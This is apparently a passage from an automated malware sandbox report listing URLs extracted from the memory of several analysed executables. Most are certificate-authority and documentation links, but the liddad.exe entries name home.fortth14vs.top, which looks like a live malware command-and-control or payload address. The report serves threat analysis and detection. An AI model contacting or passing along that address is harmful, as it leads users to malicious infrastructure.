                                  Source: client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.cr
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.dig
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFA9000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF6B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765739149.000002103D958000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781548241.000002103D95A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776435894.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773693170.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785963640.000002103D95B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpo
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFA9000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2788433493.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778318404.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2764899734.000002103DA38000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771896147.000002103D5E5000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789428505.000002103D64B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785200465.000002103DA3D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2786429300.000002103D644000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802094004.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785783055.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765366877.000002103D5E4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772439999.000002103D641000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782068585.000002103D644000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2792961287.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778600102.000002103D643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2779787225.000002103D991000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803226181.000002103DF15000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803573189.000002103E084000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787722838.000002103E025000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2786153630.000002103D991000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781952523.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789333680.000002103DF13000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772329883.000002103E012000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805687091.000002103E490000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF6B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773075995.000002103D990000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787855784.000002103E084000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103D963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802348249.000002103DB60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802348249.000002103DB60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFA9000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803453745.000002103DFAB000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783015876.000002103DFB8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783114885.000002103DFC2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784989375.000002103DFE6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780195788.000002103DFB2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785103570.000002103DFEF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2787855784.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783015876.000002103DFB8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781952523.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772329883.000002103E012000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780195788.000002103DFB2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                  Source: liddad.exe, 00000015.00000003.2658374926.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000002.2661089590.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658137433.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658175825.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658626108.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000002.2659798097.00000000006D9000.00000004.00000001.01000000.00000012.sdmp, liddad.exe, 00000015.00000003.2659011192.0000000000F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                                  Source: liddad.exe, 00000015.00000003.2659011192.0000000000F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1
                                  Source: liddad.exe, 00000015.00000003.2658374926.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000002.2661089590.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658137433.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658175825.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2658626108.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2659011192.0000000000F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
                                  Source: liddad.exe, 00000015.00000002.2659798097.00000000006D9000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://html4/loose.dtd
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2787855784.000002103E084000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785963640.000002103D95B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778242180.000002103E164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digi
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
